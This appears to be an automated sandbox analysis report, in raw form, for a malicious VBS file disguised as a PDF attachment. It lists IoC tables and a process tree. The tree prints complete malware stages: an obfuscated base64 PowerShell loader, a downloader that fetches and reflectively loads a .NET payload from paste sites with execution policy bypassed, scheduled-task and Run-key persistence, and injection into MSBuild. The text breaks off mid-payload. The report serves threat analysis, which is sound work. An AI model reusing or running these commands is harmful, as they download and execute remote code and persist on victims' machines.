4748	schtasks.exe
3684	schtasks.exe
3340	schtasks.exe
4084	schtasks.exe
436	schtasks.exe
5236	schtasks.exe
3908	schtasks.exe
3352	schtasks.exe
2588	schtasks.exe
452	schtasks.exe
1548	schtasks.exe
5496	schtasks.exe
468	schtasks.exe
4232	schtasks.exe
4036	schtasks.exe
3968	schtasks.exe
452	schtasks.exe
4976	schtasks.exe
6064	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1412	powershell.exe
1412	powershell.exe
5132	powershell.exe
5132	powershell.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
5048	powershell.exe
5048	powershell.exe
2036	powershell.exe
2036	powershell.exe
3700	powershell.exe
3700	powershell.exe
2036	powershell.exe
5048	powershell.exe
3700	powershell.exe
5048	powershell.exe
5976	powershell.exe
5976	powershell.exe
5976	powershell.exe
1764	powershell.exe
1764	powershell.exe
1764	powershell.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe
5592	powershell.exe
5592	powershell.exe
5592	powershell.exe
5220	powershell.exe
5220	powershell.exe
5220	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
5420	powershell.exe
3692	powershell.exe
5420	powershell.exe
3692	powershell.exe
3352	powershell.exe
3352	powershell.exe
3692	powershell.exe
3352	powershell.exe
5420	powershell.exe
3352	powershell.exe
1440	powershell.exe
1440	powershell.exe
1440	powershell.exe
1824	powershell.exe
1824	powershell.exe
1824	powershell.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
1308	powershell.exe
1308	powershell.exe
1308	powershell.exe
3092	powershell.exe
3092	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	5132	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	5976	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	5592	powershell.exe
Token: SeDebugPrivilege	5220	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	5420	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	5836	powershell.exe
Token: SeDebugPrivilege	5820	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	2596	MSBuild.exe
Token: 33	2596	MSBuild.exe
Token: SeIncBasePriorityPrivilege	2596	MSBuild.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	6096	powershell.exe
Token: SeDebugPrivilege	5896	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: 33	2596	MSBuild.exe
Token: SeIncBasePriorityPrivilege	2596	MSBuild.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	5668	powershell.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: 33	2596	MSBuild.exe
Token: SeIncBasePriorityPrivilege	2596	MSBuild.exe
Token: SeDebugPrivilege	440	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 776 wrote to memory of 880	776	WScript.exe	86
PID 776 wrote to memory of 880	776	WScript.exe	86
PID 776 wrote to memory of 3684	776	WScript.exe	88
PID 776 wrote to memory of 3684	776	WScript.exe	88
PID 776 wrote to memory of 1412	776	WScript.exe	90
PID 776 wrote to memory of 1412	776	WScript.exe	90
PID 1412 wrote to memory of 5132	1412	powershell.exe	92
PID 1412 wrote to memory of 5132	1412	powershell.exe	92
PID 5132 wrote to memory of 4132	5132	powershell.exe	101
PID 5132 wrote to memory of 4132	5132	powershell.exe	101
PID 4132 wrote to memory of 5048	4132	powershell.exe	102
PID 4132 wrote to memory of 5048	4132	powershell.exe	102
PID 4132 wrote to memory of 2036	4132	powershell.exe	103
PID 4132 wrote to memory of 2036	4132	powershell.exe	103
PID 4132 wrote to memory of 3700	4132	powershell.exe	104
PID 4132 wrote to memory of 3700	4132	powershell.exe	104
PID 5048 wrote to memory of 5976	5048	powershell.exe	105
PID 5048 wrote to memory of 5976	5048	powershell.exe	105
PID 3644 wrote to memory of 1764	3644	cmd.exe	108
PID 3644 wrote to memory of 1764	3644	cmd.exe	108
PID 1764 wrote to memory of 2840	1764	powershell.exe	109
PID 1764 wrote to memory of 2840	1764	powershell.exe	109
PID 2840 wrote to memory of 2668	2840	WScript.exe	110
PID 2840 wrote to memory of 2668	2840	WScript.exe	110
PID 2668 wrote to memory of 5676	2668	powershell.exe	112
PID 2668 wrote to memory of 5676	2668	powershell.exe	112
PID 5676 wrote to memory of 3688	5676	wscript.exe	113
PID 5676 wrote to memory of 3688	5676	wscript.exe	113
PID 5676 wrote to memory of 6064	5676	wscript.exe	115
PID 5676 wrote to memory of 6064	5676	wscript.exe	115
PID 5676 wrote to memory of 5592	5676	wscript.exe	117
PID 5676 wrote to memory of 5592	5676	wscript.exe	117
PID 5592 wrote to memory of 5220	5592	powershell.exe	120
PID 5592 wrote to memory of 5220	5592	powershell.exe	120
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 4132 wrote to memory of 2596	4132	powershell.exe	121
PID 5220 wrote to memory of 2296	5220	powershell.exe	124
PID 5220 wrote to memory of 2296	5220	powershell.exe	124
PID 2296 wrote to memory of 3352	2296	powershell.exe	125
PID 2296 wrote to memory of 3352	2296	powershell.exe	125
PID 2296 wrote to memory of 3692	2296	powershell.exe	126
PID 2296 wrote to memory of 3692	2296	powershell.exe	126
PID 2296 wrote to memory of 5420	2296	powershell.exe	127
PID 2296 wrote to memory of 5420	2296	powershell.exe	127
PID 3352 wrote to memory of 1440	3352	powershell.exe	128
PID 3352 wrote to memory of 1440	3352	powershell.exe	128
PID 6080 wrote to memory of 1824	6080	cmd.exe	131
PID 6080 wrote to memory of 1824	6080	cmd.exe	131
PID 1824 wrote to memory of 3080	1824	powershell.exe	132
PID 1824 wrote to memory of 3080	1824	powershell.exe	132
PID 3080 wrote to memory of 4844	3080	WScript.exe	133
PID 3080 wrote to memory of 4844	3080	WScript.exe	133
PID 4844 wrote to memory of 5136	4844	powershell.exe	135
PID 4844 wrote to memory of 5136	4844	powershell.exe	135
PID 5136 wrote to memory of 2744	5136	wscript.exe	136
PID 5136 wrote to memory of 2744	5136	wscript.exe	136
PID 5136 wrote to memory of 3340	5136	wscript.exe	138
PID 5136 wrote to memory of 3340	5136	wscript.exe	138

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\attach.pdf\EncriptadoOOKK50.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:776
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
  2⤵
  PID:880
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\attach.pdf\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\attach.pdf\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4132
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5976
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\attach.pdf\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\attach.pdf\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3700
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:3644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5676
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:3688
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6064
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf